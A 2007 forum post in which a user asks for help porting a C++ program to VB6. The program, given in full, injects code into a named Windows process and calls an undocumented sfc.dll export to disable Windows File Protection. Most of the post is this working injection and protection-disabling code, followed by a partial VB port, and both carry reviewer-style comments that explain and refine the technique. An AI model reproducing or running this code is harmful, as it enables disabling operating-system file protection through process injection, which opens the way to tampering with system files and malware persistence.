May 27th, 2007, 04:57 AM
Memory API Help.......... (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread)
I am trying to convert some code from C++ (the listing uses try/catch, so it is really C++ rather than C) to VB, but the memory API functions really confuse me.
Here is the code:
Code:
----- dwfp2.cpp
#define WIN32_LEAN_AND_MEAN
#define STRICT
#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <stdio.h>
#include <string.h>
#pragma check_stack (off)
// Body of the injected thread. inject_thread copies the raw bytes of this
// function (up to the address of after_thread_func) into the target process
// and starts a thread there with the address of sfc!SfcTerminateWatcherThread
// as the thread parameter, so the code runs at a different address than it
// was compiled for. It therefore has to stay self-contained: the only call is
// through the supplied pointer, there are no globals, string literals or CRT
// calls, and the stack probe is suppressed by the check_stack(off) pragma
// above so the compiler does not emit a call into this module's CRT.
// NOTE(review): this still assumes a build that emits the function as plain,
// contiguous, relocation-free code (no incremental-link thunks, no
// security-cookie prologue) — confirm with the actual compiler settings.
DWORD exec_func(FARPROC SfcTerminateWatcherThread)
{
SfcTerminateWatcherThread();
return 0;   // becomes the remote thread's exit code
}
// Marker only, never called: inject_thread uses its address as the end of
// exec_func's code, so the copy length is (after_thread_func - exec_func).
// This relies on the compiler laying the two functions out adjacently in
// source order; a build that reorders or thunks functions breaks it
// (TODO confirm with the build settings used).
void after_thread_func(void){}
#pragma check_stack
int adjust_privileges(void);
DWORD get_process_pid(char *);
int inject_thread(DWORD, LPVOID);
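// Entry point: dwfp2 [process name]
// Resolves SfcTerminateWatcherThread from sfc.dll, enables SeDebugPrivilege
// on our own token, locates the named process and injects a thread into it
// that calls the function there; the listing's own success message describes
// the effect as disabling Windows File Protection in that process.
// Exit code: 0 on success, 1 on usage error, -1 on any API failure (the
// failing step is printed).
// NOTE(review): the export is looked up by ordinal (2), not by name, which
// suggests a non-public entry point; nothing in this listing establishes that
// the ordinal is stable across Windows versions or that the watcher-thread
// mechanism exists on releases newer than the one this was written for —
// confirm against the target system's sfc.dll before relying on it. This is
// deliberately destructive (it switches off a protection mechanism in a
// system process) and needs a token that can hold SeDebugPrivilege.
int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("%s [process name]\n", argv[0]);
        return 1;
    }

    /* Report a missing sfc.dll on its own instead of letting it surface as a
       GetProcAddress(NULL, ...) failure with a misleading message. */
    HMODULE hSfc = LoadLibrary("sfc.dll");
    if (hSfc == NULL) {
        printf("Error: LoadLibrary(sfc.dll):%lu\n", GetLastError());
        return -1;
    }
    FARPROC pSTWT = GetProcAddress(hSfc, (LPCSTR)2);   /* export ordinal 2 */
    if (pSTWT == NULL) {
        printf("Error: SfcTerminateWatcherThread\n");
        return -1;
    }

    int err = adjust_privileges();
    if (err != 0) {
        printf("Error: adjust_privileges:%d\n", err);
        return -1;
    }

    DWORD dwPID = get_process_pid(argv[1]);
    if (dwPID == 0) {
        printf("Error: get_process_pid\n");
        return -1;
    }

    err = inject_thread(dwPID, (LPVOID)pSTWT);
    if (err != 0) {
        printf("Error: inject_thread:%d\n", err);
        return -1;
    }

    printf("Windows File Protection Disabled.\n");
    return 0;
}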
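// Enables SeDebugPrivilege on the current process token so that OpenProcess
// can later open processes owned by other accounts (e.g. a system process).
// Returns 0 on success, otherwise the number of the step that failed:
//   1 OpenProcessToken failed
//   2 LookupPrivilegeValue failed
//   3 AdjustTokenPrivileges failed
//   4 the token does not hold SeDebugPrivilege at all — AdjustTokenPrivileges
//     returns TRUE in that case and only signals it through
//     GetLastError() == ERROR_NOT_ALL_ASSIGNED, which the original check
//     missed; this is what a non-administrative token produces.
int adjust_privileges(void)
{
    HANDLE hToken = NULL;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
        return 1;

    int ret = 0;
    LUID luid;
    if (!LookupPrivilegeValue(NULL, "SeDebugPrivilege", &luid)) {
        ret = 2;
    } else {
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        tp.Privileges[0].Luid = luid;
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        if (!AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL)) {
            ret = 3;
        } else if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
            /* "Success" without the privilege actually being enabled. */
            ret = 4;
        }
    }

    CloseHandle(hToken);
    return ret;
}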
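// Returns the PID of a running process whose image file name equals psname,
// or 0 if none matches, psname is NULL, or the snapshot cannot be taken.
// The comparison is case-insensitive (_stricmp) because Windows image names
// are; the original strcmp silently failed on e.g. "WINLOGON.EXE" vs
// "winlogon.exe". When several processes share the name, the one enumerated
// last wins (unchanged from the original) — callers needing a particular
// instance must disambiguate themselves.
DWORD get_process_pid(char *psname)
{
    if (psname == NULL)
        return 0;

    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnap == INVALID_HANDLE_VALUE)
        return 0;

    DWORD found = 0;
    PROCESSENTRY32 pe;
    pe.dwSize = sizeof(pe);   /* Process32First rejects an unset dwSize */
    for (BOOL ok = Process32First(hSnap, &pe); ok; ok = Process32Next(hSnap, &pe)) {
        if (_stricmp(pe.szExeFile, psname) == 0)
            found = pe.th32ProcessID;
    }

    CloseHandle(hSnap);
    return found;
}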
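// Copies the machine code of exec_func into process dwPID, runs it there on
// a new thread with pfunc as the thread argument, and waits up to 10 s for
// that thread to finish.
// Returns 0 on success or the number of the failing step:
//   1 OpenProcess   2 VirtualAllocEx   3 WriteProcessMemory
//   4 CreateRemoteThread   5 the wait did not complete (timeout/failure)
//   6 VirtualProtectEx
//
// Changes from the original listing, all security/correctness motivated:
// - The original allocated the remote page PAGE_READWRITE and then started
//   a thread in it. A non-executable page cannot be run where DEP/NX is
//   enforced for the target; the thread would fault on its first
//   instruction. The page is now written while RW and flipped to
//   PAGE_EXECUTE_READ before the thread starts, so it is never W+X.
// - The process is opened with only the rights actually used instead of
//   PROCESS_ALL_ACCESS.
// - On a timeout the remote thread may still be executing inside the
//   allocation, so it is deliberately NOT freed in that case (the original
//   freed it, which can crash the target). It is freed after a completed
//   wait and on earlier failures; the thread handle is always closed.
// NOTE(review): the copy length assumes the compiler placed
// after_thread_func directly after exec_func — see those definitions.
int inject_thread(DWORD dwPID, LPVOID pfunc)
{
    const DWORD  access   = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                            PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
    const SIZE_T code_len = (SIZE_T)((char *)after_thread_func - (char *)exec_func);

    HANDLE hProcess = OpenProcess(access, FALSE, dwPID);
    if (hProcess == NULL)
        return 1;

    int    ret         = 0;
    HANDLE hThread     = NULL;
    LPVOID remote_mem  = NULL;
    BOOL   free_remote = TRUE;
    DWORD  old_protect = 0;

    remote_mem = VirtualAllocEx(hProcess, NULL, code_len, MEM_COMMIT, PAGE_READWRITE);
    if (remote_mem == NULL) {
        ret = 2;
    } else if (!WriteProcessMemory(hProcess, remote_mem, (char *)exec_func, code_len, NULL)) {
        ret = 3;
    } else if (!VirtualProtectEx(hProcess, remote_mem, code_len, PAGE_EXECUTE_READ, &old_protect)) {
        ret = 6;
    } else {
        hThread = CreateRemoteThread(hProcess, NULL, 0,
                                     (LPTHREAD_START_ROUTINE)remote_mem, pfunc, 0, NULL);
        if (hThread == NULL) {
            ret = 4;
        } else if (WaitForSingleObject(hThread, 10 * 1000) != WAIT_OBJECT_0) {
            /* Timeout or wait failure: the thread's state is unknown, so the
               code page must stay mapped. */
            ret = 5;
            free_remote = FALSE;
        }
    }

    if (hThread != NULL)
        CloseHandle(hThread);
    if (remote_mem != NULL && free_remote)
        VirtualFreeEx(hProcess, remote_mem, 0, MEM_RELEASE);
    CloseHandle(hProcess);
    return ret;
}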
-----
Here is what I have so far:
(I stopped at VirtualAllocEx because I am not sure what this size expression means: `(SIZE_T)((char *)after_thread_func - (char *)exec_func)`)
Code:
' Work-in-progress VB6 port of main/inject_thread from dwfp2.cpp; it stops
' after the VirtualAllocEx call. It relies on GetProcAddress2 and
' EnableProcessPrivileges wrappers and on module-level hProcess and lPID
' that are not shown in this listing.
' NOTE(review): in the C listing the allocation size is the byte length of
' exec_func's compiled code (next function's address minus exec_func's
' address). A VB procedure cannot be copied into another process the same
' way — it is not self-contained native code — so the port will need the
' injected routine supplied as an explicit Byte array of machine code, with
' lSize set to its length. Confirm this approach before going further.
Public Sub InjectCode2()
Dim pSFCModule As Long
Dim pSTWT As Long 'SfcTerminateWatcherThread
Dim pDataRemote As Long
Dim lSize As Long 'NOTE(review): never assigned, so the VirtualAllocEx below requests 0 bytes and will fail
'Get Handles:
pSFCModule = LoadLibrary("sfc.dll")
pSTWT = GetProcAddress2(pSFCModule, 2) 'lookup by ordinal 2, the C version's (LPCSTR)2; 0 means not found
MsgBox pSTWT 'debug output only
'Enable Debug privilege
Call EnableProcessPrivileges(GetCurrentProcessId, SE_Debug)
'Open Process:
Call EnableProcessPrivileges(GetCurrentProcessId, SE_Debug) 'NOTE(review): duplicate of the call two lines up; one is enough
hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, lPID) 'lPID and hProcess are not declared in this Sub; PROCESS_ALL_ACCESS is more than the injection needs
MsgBox hProcess 'debug output only; 0 means OpenProcess failed (usually missing SeDebugPrivilege)
pDataRemote = VirtualAllocEx(hProcess, 0, lSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE) 'executable page, unlike the C listing's PAGE_READWRITE — required to run the copied code
End Sub
Jun 14th, 2007, 10:06 AM
Re: Memory API Help.......... (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread